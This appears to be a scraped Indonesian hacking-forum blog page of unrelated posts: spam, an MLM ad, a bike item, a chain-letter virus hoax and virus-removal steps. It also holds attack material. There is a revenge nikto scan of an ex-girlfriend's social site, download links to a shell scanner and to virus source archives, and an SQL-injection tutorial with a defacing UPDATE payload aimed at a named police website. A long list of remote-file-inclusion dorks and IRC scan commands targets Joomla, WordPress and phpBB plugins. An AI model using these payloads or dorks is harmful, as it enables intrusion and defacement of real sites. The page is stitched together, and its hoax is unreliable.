history screen
Announcement
various
Introduction
Interesting...
I need help about script!!!
Please Help...
Report
Membership Confirmation
Get a FREE gift!
Today Only
New Contests
Lost & Found
bad news
fantastic
click on this!
Market Update Report
empty account
My eBay ads
25 merchants and rising
CALL FOR INFORMATION!
new reading
Sponsors needed
SCAM alert!!!
Warning!
its easy
free shipping!
Daily Email Reminder
Tools For Your Online Business
New bonus in your cash account
Your Gift
$150 FREE Bonus!
Your News Alert
Get 8 FREE issues - no risk!
Greets!

The patch can be found on Microsoft Security Bulletin MS01-027.

Hmm, now you know why Linux is such a good OS=)

Friendster scannig with nikto

when i scanning at night, couse im so hurt with my exgirl...she had has an account in friendster, so i wanna try to check vulnerabilities hole in friendster without pishing or fake login...
so i scanning friendster with nikto.....

n then i found it:
+ OSVDB-561: GET /server-status : This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.


wow, very nicely for information about a target....

this a screen shoot when i get a server-status for attacking me....



i hpe for a girls in the world...dont make hurt a boy..cause can be disater for you n all...

nanda is my fucking exgirl.....

* Report this post * Reply with quote Do NOT be the next YouTube victimImagine... having hundreds of videos with extremely valuable content

Imagine... having hundreds of videos with extremely valuable content, getting 20-30 leads per day from your YouTube channel, hundreds of thousands of video views, thousands of subscribers & friends, and all of your marketing websites included a little
personalized YouTube video of yourself... and then one day logging in and ITS ALL GONE!

Well if you haven't noticed yet, YouTube is on the rampage right now and is looking for any and all types of "suspicious" activity so that they can shut YOU down!

And get this...

If you are in network marketing, online sales, direct sales or promoting a product, then you are about 100x more likely to get your YouTube channel suspended! (if you don't follow a secret
group of guidelines)

This Wednesday we're going to show you how you can beat the YouTube
beast forever so that you never have to experience this feeling...

We've got some of the best insight from the biggest and brightest YouTube marketers on how to get around
the YouTube "slap." If you're building a solid presence and lead flow from your YouTube channel,this is going to be a training that will save your life!

Mark your calendars for this wednesday, May 13th at 9:00 PM EST..

9PM Eastern
8PM Central
7PM Mountain
6PM Pacific

Space is limited.
Reserve your Webinar seat now at:
http://webinar.easymlmsales.com/?t=invite


Do NOT be the next YouTube victim. Come learn what the big boys are doing to DOMINATE the phenom that is YouTube!

Reserve your Webinar seat now at:
http://webinar.easymlmsales.com/?t=invite


From :
http://www.facebook.com/event.php?eid=78074534087



sumber:http://www.jasakom.com/forum/viewtopic.php?f=111&t=9217

Shell scanner tool

shell scanner yah pasti semua yang sudah tahu adalam dunia underground sudah tahu buat apa funsi dari tools tersebut. tools ini bisa di download

http://www.4shared.com/file/96610170/88df9a39/shell_scannar.html


dengan password:

zerocode66

muf nih g da screenshotnya :p

Virus varian baru

waduh kaka, semakin ahri semakin banyak dan berbahaya saja para virus maker membuat virusnya, denagn nama yanga aneh-aneh pula....nah ini dia saya mau sedikit berbagi virus ini, cara kerjanya seperti ini menurut analisis teman saya di forum:

dia menyerang seluruh ekstensi file
ga pandang itu office, film atau musik
pokoke serangan membabi buta

file yang diserang jadi ga jelas bentuknya (seperti di gambar yang telah saya berikan)

sosio02 berkata dan beranalisis:

file yang terinfeksi:
-ga akan pernah bisa di buka kembali
-ga akan pernah bisa di delete (meskipun udah pake cara attrib di cmd, maupun shredder)
-ketika kita berusaha mendeletenya file akan semakin menyebar/menginfeksi file2 lainnya. kemudian muncul folder ga jelas dengan nama +I^II_| atau found.0001, found.0002, found.00003,dst..... atau zzzzzz.zzzzzz

gw dah coba seminggu keluarin semua ilmu, nanya sana dan nanya sini namun semua pada kagak tahu jenis virus apakah ini...

GW nyeRaH..........

dan akhirnya, gw bunuh tuh virus dengan memformat ulang....


kalo mau belajar lagi bisa di download sourcenya di

http://rapidshare.com/files/236254790/_RIANA_1.rar


dan

http://rapidshare.com/files/236254937/_AMMYB_1.rar


screenshot merusaknya seperti ini:


Virus paling jahat dari yang pernah ada!!

WASPADALAH?? ??????
VIRUS PALING JAHAT DARI YANG PERNAH ADA
Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai
yang paling merusak! Virus itu baru ditemukan pada hari Minggu siang yang
lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi
informasi-informasi terpenting. Virus ini berjalan sebagai berikut :
· secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat
anda dengan judul "Sebuah Kartu Untuk Anda" ( Une Carte Pour Vous , atau A
Card For You );
· begitu kartu virtual itu terbuka, virus itu akan membekukan komputer
sehingga penggunanya harus memulainya kembali; kalau anda menekan
CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari
Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.
Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New
York
. Peringatan ini telah diterima oleh pegawai Microsoft sendiri.
Jangan membuka e-mail dengan judul "Sebuah kartu virtual untuk Anda"( Une
Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar
orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali
daripada tidak sama sekali.
AWAS!!!
Jangan terima kontak "pti_bout_de_ chou@hotmail.com" . Ini virus yang akan
memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam
daftar alamat anda.
Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya
dalam daftar alamatnya, komputer anda juga akan terkena

Info antivirus: www.computerantivirus.tk
dan echo

Anti virus amburadul

waduh perkembangan komputersaat ini, makin pesat saja, banyak negative dan banyak positifnya, kali ini saya akan bahas negativenya, yakni virus, virus ini sungguh sangat menyebalkan, suka mengangu pengguna komputer, bagi awam akan merasa ketakutan dengan ulanhnya...yah amburadul lah yang sangat buat komputer kita amburadul.....

nah sekarang jgn takut lagi, udah ada anti virusnya alias removalnya, silahkan ikuti step dibawah ini:

- Disconnect komputer yang akan dibersihkan dari jaringan
- Disable “system restore” selama proses pembersihan (Windows ME/XP)
- Matikan proses virus yang aktif di memory resdent. Untuk mematikan proses tersebut gunakan tools “currprocess”. Kemudian matikan proses virus yang mempunyai icon JPG.
- Repair registry yang sudah di ubah oleh . Untuk mempercepat proses perbaikan silahkan salin script dibawah ini pada program notepad kemudian simpan dengan nama repair.inf.

- Jalankan file tersebut dengan cara:
- Klik kanan repair.inf
- Klik Install

[Version]
Signature="$Chicago$"
Provider=Vaksincom

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, UncheckedValue,0x00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt,CheckedValue,0x00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt,DefaultValue,0x00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0x00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, CheckedValue,0x00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, DefaultValue,0x00010001,0
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, "about:blank"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, "checkbox"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, "checkbox"
HKCU, Control Panel\International, s1159,0, "AM"
HKCU, Control Panel\International, s2359,0, "PM"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, SuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt,0x00010001,0

[del]
HKCU, Software\Microsoft\Internet Explorer\Main, Window Title,
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableConfig
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore, DisableSR
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kspoold.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kspool.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HokageFile.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rin.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Obito.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KakashiHatake.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears-CLN.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears-RTP.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HOKAGE4.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Britney Spears
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Setup.exe,debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Instal.exe, debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Install.exe,debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansavgd.exe
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, DisableMSI
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, LimitSystemRestoreCheckpointing
HKCR, exefile, NeverShowExt
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, PaRaY_VM
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, ConfigVir
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, NviDiaGT
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, NarmonVirusAnti
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, AVManager
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, EnableLUA

- Hapus file induk virus . Sebelum menghapus file tersebut sebaiknya tampilkan file yang tersembunyi caranya :
- Buka Windows Explorer
- Klik menu “Tools”
- Klik “Folder Options”
- Klik Tabulasi View
- Pada kolom “Advanced settings”
- Pilih opsi “Show hidden files and folders”
- Unchek “Hide extensions for known file types”
- Uncheck “Hide protected operating system files (Recommended)

Kemudian hapus file berikut:

• C:\Windows\system32\~A~m~B~u~R~a~D~u~L~
• csrcc.exe
• smss.exe
• lsass.exe
• services.exe
• winlogon.exe
• Paraysutki_VM_Community.sys
• msvbvm60.dll
• C:\Autorun.inf
• C:\FoToKu xx-x-*.exe, dimana x menunjukan tanggal virus tesebut di aktifkan (contohnya: FoToKu 14-3-2008.exe)
• C:\Friendster Community.exe
• C:\J3MbataN K4HaYan.exe
• C:\MyImages.exe
• C:\PaLMa.exe
• C:\Images

- Hapus juga file induk virus di flash disk /disket

- C:\Autorun.inf
- C:\FoToKu xx-x-*.exe, dimana x menunjukan tanggal virus
tesebut di aktifkan (contohnya: FoToKu 14-3-2008.exe)
- C:\Friendster Community.exe
- C:\J3MbataN K4HaYan.exe
- C:\MyImages.exe
- C:\PaLMa.exe
- C:\Images

- Tampilkan file gambar yang telah disembbunyikan di Flash Disk dengan cara:
- Klik “Start” menu
- Klik “Run”
- Ketik “CMD”
- Pada Dos Prompt, pindahkan posisi kursor ke lokasi Flash Disk
kemudian ketik perintah berikut ATTRIB –s –h /s /d

- Untuk pembersihan optimal dan mencegah infeksi ulang scan dengan
antivirus yang up-to-date dan sudah dapat mengenali virus ini dengan
baik.

Semoga membantu dan bermanfaat bagi semua yang ingin belajar mengatasi virus :p

Sepeda lipat atau Folding Bike Mercedez

Jika anda pengemar mobil Mercedez, bagaimana dengan sepedanya. Pabrikan mobil Mercedez juga membuat sepeda lipat , model dibawah ini adalah model paling baru yang dikeluarkan oleh Mercedez.



Bila dilipat, ukurannya hanya 80x80x35cm, sehingga bisa di jinjing dalam tas khusus. Mercedez Folding Bike mengunakan sistem suspensi yang dirancang khusus dengan daya redam 40mm dibagian belakang dan depan. Sedangkan perlengkapan sepedanya sudah dimasukan dengan 8 gigi dari Shimano serta Disk Break.



Harganya 1.700 Euro saja, dan baru direlease pada 31 Mei.

sumber:http://obengware.com/news/index.php?id=4391

Freedownload Buku CEH

waduh susah yah cari buku CEH (certificate Ethical Hacking) yang terkenal itu,mana kalo kita mau download harus bayar dulu lagi, ok kalo gitu, cuma mau bagi-bagi hadiah buku gratis n bisa di download sesuka hati kamu ko,

http://www.megaupload.com/?d=A3F1N4JQ


nah ini passwordnya
hackforums

selamat mendownload n membaca yah, semoga berhasil....

Wow, ilmuwan bakal ciptakan konsol super!!

LONDON - Tak dipungkiri era baru konsol game akan segera dimulai. Pasalnya, sebuah konsol super, tengah dikembangkan. Konsol yang sedang dikembangkan tersebut diklaim mampu 'membaca' semua format game, termasuk game-game komputer.

Saat ini, konsol super itu sedang dilakukan oleh University of Portsmouth. Untuk membuat alat yang dapat menyimpan berbagai file digital yang pernah ada, baik itu game yang paling baru sampai dengan yang sudah lawas kabarnya University of Portsmouth bekerjasama dengan ilmuwan lain dari Eropa dan Amerika Serikat.

Diharapkan konsol super tersebut mampu menyimpan 2 juta pon konten pada 2010, yang mana ini sama dengan 18 juta informasi dalam satu waktu dengah hanya cukup sekali klik saja.

Info: www.playstationx.tk

ASP Hacking ( make a simple ASP hacking)

ASP HACKING[yang sangat mudah]

nih sebenarnya tutorial ge isenk ja waktu kami sedang ngumpul dan bobo bareng,muhahahaha
akhirnya jadi tutor ini, singkat simple, kepadetan, dan kalo mank masih tanya kebangetan,muahahahaha!!

langsung baca za nih, tinggal praktek za:

http://www.copley.oh.us/police.asp?id=43

http://www.copley.oh.us/police.asp?id=43'a

http://www.copley.oh.us/police.asp?id=43 having 1=1

klo misalnye group by beruntung loe inject ae lsg

nah pada saat group by kan muncul tuh kaya 'PageContent.title'

nah pagecontent = table
title = column

nah sekarang tinggal hack dgn metode update
+update+table+set+kolom='hacked muhahaaha';--

kira gini jadina

http://www.copley.oh.us/police.asp?id=43+update+table+set+kolom='hacked muhahaaha';--


muhahahah hacked deh muhahahahah


thanks : Laptop w acer 4720

created: kiddies n gonzhack

RFI Dork 1

emh RFI hacking waduh salah satu kelemahan web aplikasi dengan mudahnya para peretas meremote kedalam web lawan atau target RFI (remote file inclusion) itu lah sebutannya...

bagi yang inngin melakukan scanning di IRC silahkan mempergunakan dor ini untuk melakukan scanning, jika ada yang baru silahkan tambahkan di colom komentar

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=

ini untuk wordpress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

PhpBb

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=


Lain-lain

!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" net "zeroboard" uk
!scan classes/core/language.php?rootdir= "LimeSurvey"
!scan classes/core/language.php?rootdir= "You have not provided a survey identification number"
